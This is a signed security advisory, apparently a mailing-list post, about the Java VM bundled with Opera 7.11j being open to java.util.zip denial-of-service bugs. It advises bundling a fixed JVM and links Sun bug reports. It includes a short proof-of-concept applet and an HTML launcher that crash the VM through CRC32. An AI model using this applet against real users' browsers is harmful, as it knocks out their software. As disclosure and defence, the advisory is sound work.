-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, the just released Opera 7.11j comes with a java vm (1.4.1_01) that is vulnerable to the java.util.zip.* bugs that can cause denial of service via Java Applets like the one with source printed below. Therefore my suggestion towards the Opera deployment team is to bundle java 1.4.1_02 which is not vulnerable to the java.util.zip-Bugs. All 1.3.1 versions are still vulnerable ! If you already installed java 1.4.1_02 prior to installing Opera you are not vulnerable, because the most current jvm seems to be chosen by opera when running applets. If you are interested in the details (not opera-specific), read the whole story at www.illegalaccess.org or read: http://developer.java.sun.com/developer/bugParade/bugs/4811913.html http://developer.java.sun.com/developer/bugParade/bugs/4812181.html http://developer.java.sun.com/developer/bugParade/bugs/4812006.html http://developer.java.sun.com/developer/bugParade/bugs/4811927.html http://developer.java.sun.com/developer/bugParade/bugs/4811917.html Sincerely Marc Schoenefeld The applet code: ========CRCApplet.java======================= import java.applet.Applet; import java.awt.Graphics; public class CRCApplet extends Applet{ public void paint(Graphics g) { (new java.util.zip.CRC32()).update(new byte[0],Integer.MAX_VALUE-3,4); } } ============================================= The corresponding HTML =======CRCApplet.html====================== |html> |body> |applet code=CRCApplet.class width=400 height=400> |/applet> |/body> |/html> =========================================== - -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (AIX) Comment: For info see http://www.gnupg.org iD8DBQE+vYs/qCaQvrKNUNQRAqWUAJ9tdtt9uOboP2fq+/ZqhRqE8Fet7gCfffsD nBk6PscPB5WQYpqgZaItaDw= =uUS/ -----END PGP SIGNATURE-----
